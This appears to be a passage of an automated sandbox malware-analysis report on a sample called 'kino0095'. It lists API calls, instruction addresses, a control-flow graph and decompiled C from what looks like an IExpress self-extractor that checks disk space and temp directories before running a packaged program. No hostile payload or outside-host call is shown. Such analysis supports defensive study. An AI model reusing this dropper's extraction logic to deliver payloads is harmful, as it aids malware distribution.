                                                                                                                                                                                                                                    0x010b58b5
                                                                                                                                                                                                                                    0x010b56a2
                                                                                                                                                                                                                                    0x010b56a2
                                                                                                                                                                                                                                    0x010b56a8
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b56ae
                                                                                                                                                                                                                                    0x010b56ae
                                                                                                                                                                                                                                    0x010b56b9
                                                                                                                                                                                                                                    0x010b56bf
                                                                                                                                                                                                                                    0x010b56c1
                                                                                                                                                                                                                                    0x010b56f3
                                                                                                                                                                                                                                    0x010b56f3
                                                                                                                                                                                                                                    0x010b5705
                                                                                                                                                                                                                                    0x010b570a
                                                                                                                                                                                                                                    0x010b5711
                                                                                                                                                                                                                                    0x010b5717
                                                                                                                                                                                                                                    0x010b5724
                                                                                                                                                                                                                                    0x010b5726
                                                                                                                                                                                                                                    0x010b5729
                                                                                                                                                                                                                                    0x010b5730
                                                                                                                                                                                                                                    0x010b5737
                                                                                                                                                                                                                                    0x010b573d
                                                                                                                                                                                                                                    0x010b5740
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b572b
                                                                                                                                                                                                                                    0x010b572b
                                                                                                                                                                                                                                    0x010b572e
                                                                                                                                                                                                                                    0x010b5742
                                                                                                                                                                                                                                    0x010b5742
                                                                                                                                                                                                                                    0x010b5745
                                                                                                                                                                                                                                    0x010b576b
                                                                                                                                                                                                                                    0x010b576b
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b5747
                                                                                                                                                                                                                                    0x010b5747
                                                                                                                                                                                                                                    0x010b574d
                                                                                                                                                                                                                                    0x010b574f
                                                                                                                                                                                                                                    0x010b5771
                                                                                                                                                                                                                                    0x010b5771
                                                                                                                                                                                                                                    0x010b5773
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b5751
                                                                                                                                                                                                                                    0x010b5751
                                                                                                                                                                                                                                    0x010b5753
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b5755
                                                                                                                                                                                                                                    0x010b575b
                                                                                                                                                                                                                                    0x010b5760
                                                                                                                                                                                                                                    0x010b5762
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b5764
                                                                                                                                                                                                                                    0x010b5764
                                                                                                                                                                                                                                    0x010b5769
                                                                                                                                                                                                                                    0x010b577e
                                                                                                                                                                                                                                    0x010b577e
                                                                                                                                                                                                                                    0x010b5781
                                                                                                                                                                                                                                    0x010b5788
                                                                                                                                                                                                                                    0x010b578d
                                                                                                                                                                                                                                    0x010b578f
                                                                                                                                                                                                                                    0x010b57b2
                                                                                                                                                                                                                                    0x010b57b8
                                                                                                                                                                                                                                    0x010b57bd
                                                                                                                                                                                                                                    0x010b57bf
                                                                                                                                                                                                                                    0x010b57cd
                                                                                                                                                                                                                                    0x010b57cd
                                                                                                                                                                                                                                    0x010b57dd
                                                                                                                                                                                                                                    0x010b57e3
                                                                                                                                                                                                                                    0x010b57ef
                                                                                                                                                                                                                                    0x010b57f5
                                                                                                                                                                                                                                    0x010b57f8
                                                                                                                                                                                                                                    0x010b580a
                                                                                                                                                                                                                                    0x010b580a
                                                                                                                                                                                                                                    0x010b57fa
                                                                                                                                                                                                                                    0x010b5802
                                                                                                                                                                                                                                    0x010b5802
                                                                                                                                                                                                                                    0x010b580d
                                                                                                                                                                                                                                    0x010b580f
                                                                                                                                                                                                                                    0x010b5830
                                                                                                                                                                                                                                    0x010b5836
                                                                                                                                                                                                                                    0x010b583d
                                                                                                                                                                                                                                    0x010b584b
                                                                                                                                                                                                                                    0x010b5851
                                                                                                                                                                                                                                    0x010b5855
                                                                                                                                                                                                                                    0x010b585a
                                                                                                                                                                                                                                    0x010b585c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b585e
                                                                                                                                                                                                                                    0x010b585e
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b585e
                                                                                                                                                                                                                                    0x010b5811
                                                                                                                                                                                                                                    0x010b5817
                                                                                                                                                                                                                                    0x010b5819
                                                                                                                                                                                                                                    0x010b581f
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b581f
                                                                                                                                                                                                                                    0x010b5791
                                                                                                                                                                                                                                    0x010b5797
                                                                                                                                                                                                                                    0x010b579c
                                                                                                                                                                                                                                    0x010b579e
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b57a0
                                                                                                                                                                                                                                    0x010b57a9
                                                                                                                                                                                                                                    0x010b57ae
                                                                                                                                                                                                                                    0x010b57b0
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b57b0
                                                                                                                                                                                                                                    0x010b579e
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b5769
                                                                                                                                                                                                                                    0x010b5762
                                                                                                                                                                                                                                    0x010b5753
                                                                                                                                                                                                                                    0x010b574f
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b572e
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b5864
                                                                                                                                                                                                                                    0x010b5864
                                                                                                                                                                                                                                    0x010b5864
                                                                                                                                                                                                                                    0x010b5717
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b56c3
                                                                                                                                                                                                                                    0x010b56c5
                                                                                                                                                                                                                                    0x010b56c9
                                                                                                                                                                                                                                    0x010b56ce
                                                                                                                                                                                                                                    0x010b56d0
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b56d6
                                                                                                                                                                                                                                    0x010b56d6
                                                                                                                                                                                                                                    0x010b56d8
                                                                                                                                                                                                                                    0x010b56dd
                                                                                                                                                                                                                                    0x010b56df
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b56e1
                                                                                                                                                                                                                                    0x010b56e2
                                                                                                                                                                                                                                    0x010b56e4
                                                                                                                                                                                                                                    0x010b56e6
                                                                                                                                                                                                                                    0x010b56eb
                                                                                                                                                                                                                                    0x010b56ed
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b56f3
                                                                                                                                                                                                                                    0x010b56f3
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b586c
                                                                                                                                                                                                                                    0x010b5878
                                                                                                                                                                                                                                    0x010b587e
                                                                                                                                                                                                                                    0x010b5882
                                                                                                                                                                                                                                    0x010b5883
                                                                                                                                                                                                                                    0x010b5889
                                                                                                                                                                                                                                    0x010b588e
                                                                                                                                                                                                                                    0x010b588e
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b5896
                                                                                                                                                                                                                                    0x010b56ed
                                                                                                                                                                                                                                    0x010b56df
                                                                                                                                                                                                                                    0x010b56d0
                                                                                                                                                                                                                                    0x010b56c1
                                                                                                                                                                                                                                    0x010b56a8
                                                                                                                                                                                                                                    0x010b565b
                                                                                                                                                                                                                                    0x010b565b
                                                                                                                                                                                                                                    0x010b565d
                                                                                                                                                                                                                                    0x010b5669
                                                                                                                                                                                                                                    0x010b5669
                                                                                                                                                                                                                                    0x010b565f
                                                                                                                                                                                                                                    0x010b565f
                                                                                                                                                                                                                                    0x010b5665
                                                                                                                                                                                                                                    0x010b5667
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b5667
                                                                                                                                                                                                                                    0x010b566c
                                                                                                                                                                                                                                    0x010b5673
                                                                                                                                                                                                                                    0x010b5678
                                                                                                                                                                                                                                    0x010b567a
                                                                                                                                                                                                                                    0x010b589b
                                                                                                                                                                                                                                    0x010b589b
                                                                                                                                                                                                                                    0x010b5680
                                                                                                                                                                                                                                    0x010b5685
                                                                                                                                                                                                                                    0x010b568c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b568c
                                                                                                                                                                                                                                    0x010b567a
                                                                                                                                                                                                                                    0x010b560e
                                                                                                                                                                                                                                    0x010b5613
                                                                                                                                                                                                                                    0x010b561a
                                                                                                                                                                                                                                    0x010b5620
                                                                                                                                                                                                                                    0x010b5626
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b5626
                                                                                                                                                                                                                                    0x010b55db
                                                                                                                                                                                                                                    0x010b55e0
                                                                                                                                                                                                                                    0x010b55e7
                                                                                                                                                                                                                                    0x010b55f1
                                                                                                                                                                                                                                    0x010b55f6
                                                                                                                                                                                                                                    0x010b55f6
                                                                                                                                                                                                                                    0x010b55f6
                                                                                                                                                                                                                                    0x010b58b7
                                                                                                                                                                                                                                    0x010b58c7

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 010B468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010B46A0
                                                                                                                                                                                                                                      • Part of subcall function 010B468F: SizeofResource.KERNEL32(00000000,00000000,?,010B2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010B46A9
                                                                                                                                                                                                                                      • Part of subcall function 010B468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010B46C3
                                                                                                                                                                                                                                      • Part of subcall function 010B468F: LoadResource.KERNEL32(00000000,00000000,?,010B2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010B46CC
                                                                                                                                                                                                                                      • Part of subcall function 010B468F: LockResource.KERNEL32(00000000,?,010B2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010B46D3
                                                                                                                                                                                                                                      • Part of subcall function 010B468F: memcpy_s.MSVCRT ref: 010B46E5
                                                                                                                                                                                                                                      • Part of subcall function 010B468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 010B46EF
                                                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000), ref: 010B55CF
                                                                                                                                                                                                                                    • lstrcmpA.KERNEL32(00000000,<None>,00000000), ref: 010B5638
                                                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000), ref: 010B564C
                                                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 010B5620
                                                                                                                                                                                                                                      • Part of subcall function 010B44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 010B4518
                                                                                                                                                                                                                                      • Part of subcall function 010B44B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 010B4554
                                                                                                                                                                                                                                      • Part of subcall function 010B6285: GetLastError.KERNEL32(010B5BBC), ref: 010B6285
                                                                                                                                                                                                                                    • GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 010B56B9
                                                                                                                                                                                                                                    • GetDriveTypeA.KERNEL32(0000005A,?,A:\), ref: 010B571E
                                                                                                                                                                                                                                    • GetFileAttributesA.KERNEL32(0000005A,?,A:\), ref: 010B5737
                                                                                                                                                                                                                                    • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,00000000,?,A:\), ref: 010B57CD
                                                                                                                                                                                                                                    • GetFileAttributesA.KERNEL32(0000005A,msdownld.tmp,00000000,?,A:\), ref: 010B57EF
                                                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(0000005A,00000000,?,A:\), ref: 010B5802
                                                                                                                                                                                                                                      • Part of subcall function 010B2630: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000), ref: 010B2654
                                                                                                                                                                                                                                    • SetFileAttributesA.KERNEL32(0000005A,00000002,?,A:\), ref: 010B5830
                                                                                                                                                                                                                                      • Part of subcall function 010B6517: FindResourceA.KERNEL32(010B0000,000007D6,00000005), ref: 010B652A
                                                                                                                                                                                                                                      • Part of subcall function 010B6517: LoadResource.KERNEL32(010B0000,00000000,?,?,010B2EE8,00000000,010B19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 010B6538
                                                                                                                                                                                                                                      • Part of subcall function 010B6517: DialogBoxIndirectParamA.USER32(010B0000,00000000,00000547,010B19E0,00000000), ref: 010B6557
                                                                                                                                                                                                                                      • Part of subcall function 010B6517: FreeResource.KERNEL32(00000000,?,?,010B2EE8,00000000,010B19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 010B6560
                                                                                                                                                                                                                                    • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,?,A:\), ref: 010B5878
                                                                                                                                                                                                                                      • Part of subcall function 010B597D: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 010B59A8
                                                                                                                                                                                                                                      • Part of subcall function 010B597D: SetCurrentDirectoryA.KERNELBASE(?), ref: 010B59AF
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000001.00000002.437433001.00000000010B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010B0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437414550.00000000010B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437491566.00000000010B8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_10b0000_kino0095.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Resource$Directory$Free$AttributesFileFindLoadLocalWindows$Current$AllocCreateDialogDriveErrorIndirectLastLockMessageParamPathSizeofStringTempTypelstrcmpmemcpy_s
                                                                                                                                                                                                                                    • String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$RUNPROGRAM$Z$msdownld.tmp
                                                                                                                                                                                                                                    • API String ID: 2436801531-337015389
                                                                                                                                                                                                                                    • Opcode ID: a8712b4149d8a8f24493e3a860e8f8dd2ef2b4817e3324e33be06f8acc01916c
                                                                                                                                                                                                                                    • Instruction ID: f4ad26e9b57f0a777e9a2df1de43f6c4c8d84f370e4ede3f5b4d667bb1503006
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a8712b4149d8a8f24493e3a860e8f8dd2ef2b4817e3324e33be06f8acc01916c
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 24812BB0B042059ADB71AB79ACD4BFE76ADAF65304F0400E5E6C6E3181EF758DC18B50
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 010B597D Relevance: 19.7, APIs: 13, Instructions: 212windowCOMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 324 10b597d-10b59b9 GetCurrentDirectoryA SetCurrentDirectoryA 325 10b59bb-10b59d8 call 10b44b9 call 10b6285 324->325 326 10b59dd-10b5a1b GetDiskFreeSpaceA 324->326 341 10b5c05-10b5c14 call 10b6ce0 325->341 327 10b5ba1-10b5bde memset call 10b6285 GetLastError FormatMessageA 326->327 328 10b5a21-10b5a4a MulDiv 326->328 338 10b5be3-10b5bfc call 10b44b9 SetCurrentDirectoryA 327->338 328->327 331 10b5a50-10b5a6c GetVolumeInformationA 328->331 335 10b5a6e-10b5ab0 memset call 10b6285 GetLastError FormatMessageA 331->335 336 10b5ab5-10b5aca SetCurrentDirectoryA 331->336 335->338 340 10b5acc-10b5ad1 336->340 351 10b5c02 338->351 344 10b5ad3-10b5ad8 340->344 345 10b5ae2-10b5ae4 340->345 344->345 347 10b5ada-10b5ae0 344->347 349 10b5ae7-10b5af8 345->349 350 10b5ae6 345->350 347->340 347->345 353 10b5af9-10b5afb 349->353 350->349 356 10b5c04 351->356 354 10b5afd-10b5b03 353->354 355 10b5b05-10b5b08 353->355 354->353 354->355 357 10b5b0a-10b5b1b call 10b44b9 355->357 358 10b5b20-10b5b27 355->358 356->341 357->351 360 10b5b29-10b5b33 358->360 361 10b5b52-10b5b5b 358->361 360->361 363 10b5b35-10b5b50 360->363 364 10b5b62-10b5b6d 361->364 363->364 365 10b5b6f-10b5b74 364->365 366 10b5b76-10b5b7d 364->366 367 10b5b85 365->367 368 10b5b7f-10b5b81 366->368 369 10b5b83 366->369 370 10b5b87-10b5b94 call 10b268b 367->370 371 10b5b96-10b5b9f 367->371 368->367 369->367 370->356 371->356
                                                                                                                                                                                                                                    C-Code - Quality: 96%
                                                                                                                                                                                                                                    			E010B597D(CHAR* __ecx, signed char __edx, void* __edi, intOrPtr _a4) {
				signed int _v8;
				char _v16;
				char _v276;
				char _v788;
				long _v792;
				long _v796;
				long _v800;
				signed int _v804;
				long _v808;
				int _v812;
				long _v816;
				long _v820;
				void* __ebx;
				void* __esi;
				signed int _t46;
				int _t50;
				signed int _t55;
				void* _t66;
				int _t69;
				signed int _t73;
				signed short _t78;
				signed int _t87;
				signed int _t101;
				int _t102;
				unsigned int _t103;
				unsigned int _t105;
				signed int _t111;
				long _t112;
				signed int _t116;
				CHAR* _t118;
				signed int _t119;
				signed int _t120;

				_t114 = __edi;
				_t46 =  *0x10b8004; // 0x72151d89
				_v8 = _t46 ^ _t120;
				_v804 = __edx;
				_t118 = __ecx;
				GetCurrentDirectoryA(0x104,  &_v276);
				_t50 = SetCurrentDirectoryA(_t118); // executed
				if(_t50 != 0) {
					_push(__edi);
					_v796 = 0;
					_v792 = 0;
					_v800 = 0;
					_v808 = 0;
					_t55 = GetDiskFreeSpaceA(0,  &_v796,  &_v792,  &_v800,  &_v808); // executed
					__eflags = _t55;
					if(_t55 == 0) {
						L29:
						memset( &_v788, 0, 0x200);
						 *0x10b9124 = E010B6285();
						FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
						_t110 = 0x4b0;
						L30:
						__eflags = 0;
						E010B44B9(0, _t110, _t118,  &_v788, 0x10, 0);
						SetCurrentDirectoryA( &_v276);
						L31:
						_t66 = 0;
						__eflags = 0;
						L32:
						_pop(_t114);
						goto L33;
					}
					_t69 = _v792 * _v796;
					_v812 = _t69;
					_t116 = MulDiv(_t69, _v800, 0x400);
					__eflags = _t116;
					if(_t116 == 0) {
						goto L29;
					}
					_t73 = GetVolumeInformationA(0, 0, 0, 0,  &_v820,  &_v816, 0, 0); // executed
					__eflags = _t73;
					if(_t73 != 0) {
						SetCurrentDirectoryA( &_v276); // executed
						_t101 =  &_v16;
						_t111 = 6;
						_t119 = _t118 - _t101;
						__eflags = _t119;
						while(1) {
							_t22 = _t111 - 4; // 0x2
							__eflags = _t22;
							if(_t22 == 0) {
								break;
							}
							_t87 =  *((intOrPtr*)(_t119 + _t101));
							__eflags = _t87;
							if(_t87 == 0) {
								break;
							}
							 *_t101 = _t87;
							_t101 = _t101 + 1;
							_t111 = _t111 - 1;
							__eflags = _t111;
							if(_t111 != 0) {
								continue;
							}
							break;
						}
						__eflags = _t111;
						if(_t111 == 0) {
							_t101 = _t101 - 1;
							__eflags = _t101;
						}
						 *_t101 = 0;
						_t112 = 0x200;
						_t102 = _v812;
						_t78 = 0;
						_t118 = 8;
						while(1) {
							__eflags = _t102 - _t112;
							if(_t102 == _t112) {
								break;
							}
							_t112 = _t112 + _t112;
							_t78 = _t78 + 1;
							__eflags = _t78 - _t118;
							if(_t78 < _t118) {
								continue;
							}
							break;
						}
						__eflags = _t78 - _t118;
						if(_t78 != _t118) {
							__eflags =  *0x10b9a34 & 0x00000008;
							if(( *0x10b9a34 & 0x00000008) == 0) {
								L20:
								_t103 =  *0x10b9a38; // 0x0
								_t110 =  *((intOrPtr*)(0x10b89e0 + (_t78 & 0x0000ffff) * 4));
								L21:
								__eflags = (_v804 & 0x00000003) - 3;
								if((_v804 & 0x00000003) != 3) {
									__eflags = _v804 & 0x00000001;
									if((_v804 & 0x00000001) == 0) {
										__eflags = _t103 - _t116;
									} else {
										__eflags = _t110 - _t116;
									}
								} else {
									__eflags = _t103 + _t110 - _t116;
								}
								if(__eflags <= 0) {
									 *0x10b9124 = 0;
									_t66 = 1;
								} else {
									_t66 = E010B268B(_a4, _t110, _t103,  &_v16);
								}
								goto L32;
							}
							__eflags = _v816 & 0x00008000;
							if((_v816 & 0x00008000) == 0) {
								goto L20;
							}
							_t105 =  *0x10b9a38; // 0x0
							_t110 =  *((intOrPtr*)(0x10b89e0 + (_t78 & 0x0000ffff) * 4)) +  *((intOrPtr*)(0x10b89e0 + (_t78 & 0x0000ffff) * 4));
							_t103 = (_t105 >> 2) +  *0x10b9a38;
							goto L21;
						}
						_t110 = 0x4c5;
						E010B44B9(0, 0x4c5, 0, 0, 0x10, 0);
						goto L31;
					}
					memset( &_v788, 0, 0x200);
					 *0x10b9124 = E010B6285();
					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
					_t110 = 0x4f9;
					goto L30;
				} else {
					_t110 = 0x4bc;
					E010B44B9(0, 0x4bc, 0, 0, 0x10, 0);
					 *0x10b9124 = E010B6285();
					_t66 = 0;
					L33:
					return E010B6CE0(_t66, 0, _v8 ^ _t120, _t110, _t114, _t118);
				}
			}



































                                                                                                                                                                                                                                    0x010b597d
                                                                                                                                                                                                                                    0x010b5988
                                                                                                                                                                                                                                    0x010b598f
                                                                                                                                                                                                                                    0x010b599a
                                                                                                                                                                                                                                    0x010b59a6
                                                                                                                                                                                                                                    0x010b59a8
                                                                                                                                                                                                                                    0x010b59af
                                                                                                                                                                                                                                    0x010b59b9
                                                                                                                                                                                                                                    0x010b59dd
                                                                                                                                                                                                                                    0x010b59e4
                                                                                                                                                                                                                                    0x010b59f1
                                                                                                                                                                                                                                    0x010b59fe
                                                                                                                                                                                                                                    0x010b5a0b
                                                                                                                                                                                                                                    0x010b5a13
                                                                                                                                                                                                                                    0x010b5a19
                                                                                                                                                                                                                                    0x010b5a1b
                                                                                                                                                                                                                                    0x010b5ba1
                                                                                                                                                                                                                                    0x010b5baf
                                                                                                                                                                                                                                    0x010b5bbd
                                                                                                                                                                                                                                    0x010b5bd8
                                                                                                                                                                                                                                    0x010b5bde
                                                                                                                                                                                                                                    0x010b5be3
                                                                                                                                                                                                                                    0x010b5bec
                                                                                                                                                                                                                                    0x010b5bf0
                                                                                                                                                                                                                                    0x010b5bfc
                                                                                                                                                                                                                                    0x010b5c02
                                                                                                                                                                                                                                    0x010b5c02
                                                                                                                                                                                                                                    0x010b5c02
                                                                                                                                                                                                                                    0x010b5c04
                                                                                                                                                                                                                                    0x010b5c04
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b5c04
                                                                                                                                                                                                                                    0x010b5a27
                                                                                                                                                                                                                                    0x010b5a3a
                                                                                                                                                                                                                                    0x010b5a46
                                                                                                                                                                                                                                    0x010b5a48
                                                                                                                                                                                                                                    0x010b5a4a
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b5a64
                                                                                                                                                                                                                                    0x010b5a6a
                                                                                                                                                                                                                                    0x010b5a6c
                                                                                                                                                                                                                                    0x010b5abc
                                                                                                                                                                                                                                    0x010b5ac2
                                                                                                                                                                                                                                    0x010b5ac9
                                                                                                                                                                                                                                    0x010b5aca
                                                                                                                                                                                                                                    0x010b5aca
                                                                                                                                                                                                                                    0x010b5acc
                                                                                                                                                                                                                                    0x010b5acc
                                                                                                                                                                                                                                    0x010b5acf
                                                                                                                                                                                                                                    0x010b5ad1
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b5ad3
                                                                                                                                                                                                                                    0x010b5ad6
                                                                                                                                                                                                                                    0x010b5ad8
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b5ada
                                                                                                                                                                                                                                    0x010b5adc
                                                                                                                                                                                                                                    0x010b5add
                                                                                                                                                                                                                                    0x010b5add
                                                                                                                                                                                                                                    0x010b5ae0
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b5ae0
                                                                                                                                                                                                                                    0x010b5ae2
                                                                                                                                                                                                                                    0x010b5ae4
                                                                                                                                                                                                                                    0x010b5ae6
                                                                                                                                                                                                                                    0x010b5ae6
                                                                                                                                                                                                                                    0x010b5ae6
                                                                                                                                                                                                                                    0x010b5ae9
                                                                                                                                                                                                                                    0x010b5aeb
                                                                                                                                                                                                                                    0x010b5af0
                                                                                                                                                                                                                                    0x010b5af6
                                                                                                                                                                                                                                    0x010b5af8
                                                                                                                                                                                                                                    0x010b5af9
                                                                                                                                                                                                                                    0x010b5af9
                                                                                                                                                                                                                                    0x010b5afb
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b5afd
                                                                                                                                                                                                                                    0x010b5aff
                                                                                                                                                                                                                                    0x010b5b00
                                                                                                                                                                                                                                    0x010b5b03
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b5b03
                                                                                                                                                                                                                                    0x010b5b05
                                                                                                                                                                                                                                    0x010b5b08
                                                                                                                                                                                                                                    0x010b5b20
                                                                                                                                                                                                                                    0x010b5b27
                                                                                                                                                                                                                                    0x010b5b52
                                                                                                                                                                                                                                    0x010b5b52
                                                                                                                                                                                                                                    0x010b5b5b
                                                                                                                                                                                                                                    0x010b5b62
                                                                                                                                                                                                                                    0x010b5b6b
                                                                                                                                                                                                                                    0x010b5b6d
                                                                                                                                                                                                                                    0x010b5b76
                                                                                                                                                                                                                                    0x010b5b7d
                                                                                                                                                                                                                                    0x010b5b83
                                                                                                                                                                                                                                    0x010b5b7f
                                                                                                                                                                                                                                    0x010b5b7f
                                                                                                                                                                                                                                    0x010b5b7f
                                                                                                                                                                                                                                    0x010b5b6f
                                                                                                                                                                                                                                    0x010b5b72
                                                                                                                                                                                                                                    0x010b5b72
                                                                                                                                                                                                                                    0x010b5b85
                                                                                                                                                                                                                                    0x010b5b98
                                                                                                                                                                                                                                    0x010b5b9e
                                                                                                                                                                                                                                    0x010b5b87
                                                                                                                                                                                                                                    0x010b5b8f
                                                                                                                                                                                                                                    0x010b5b8f
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b5b85
                                                                                                                                                                                                                                    0x010b5b29
                                                                                                                                                                                                                                    0x010b5b33
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b5b35
                                                                                                                                                                                                                                    0x010b5b48
                                                                                                                                                                                                                                    0x010b5b4a
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b5b4a
                                                                                                                                                                                                                                    0x010b5b0f
                                                                                                                                                                                                                                    0x010b5b16
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b5b16
                                                                                                                                                                                                                                    0x010b5a7c
                                                                                                                                                                                                                                    0x010b5a8a
                                                                                                                                                                                                                                    0x010b5aa5
                                                                                                                                                                                                                                    0x010b5aab
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b59bb
                                                                                                                                                                                                                                    0x010b59c0
                                                                                                                                                                                                                                    0x010b59c7
                                                                                                                                                                                                                                    0x010b59d1
                                                                                                                                                                                                                                    0x010b59d6
                                                                                                                                                                                                                                    0x010b5c05
                                                                                                                                                                                                                                    0x010b5c14
                                                                                                                                                                                                                                    0x010b5c14

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 010B59A8
                                                                                                                                                                                                                                    • SetCurrentDirectoryA.KERNELBASE(?), ref: 010B59AF
                                                                                                                                                                                                                                    • GetDiskFreeSpaceA.KERNELBASE(00000000,?,?,?,?,00000001), ref: 010B5A13
                                                                                                                                                                                                                                    • MulDiv.KERNEL32(?,?,00000400), ref: 010B5A40
                                                                                                                                                                                                                                    • GetVolumeInformationA.KERNELBASE(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 010B5A64
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 010B5A7C
                                                                                                                                                                                                                                    • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 010B5A98
                                                                                                                                                                                                                                    • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 010B5AA5
                                                                                                                                                                                                                                    • SetCurrentDirectoryA.KERNEL32(?,?,?,00000010,00000000), ref: 010B5BFC
                                                                                                                                                                                                                                      • Part of subcall function 010B44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 010B4518
                                                                                                                                                                                                                                      • Part of subcall function 010B44B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 010B4554
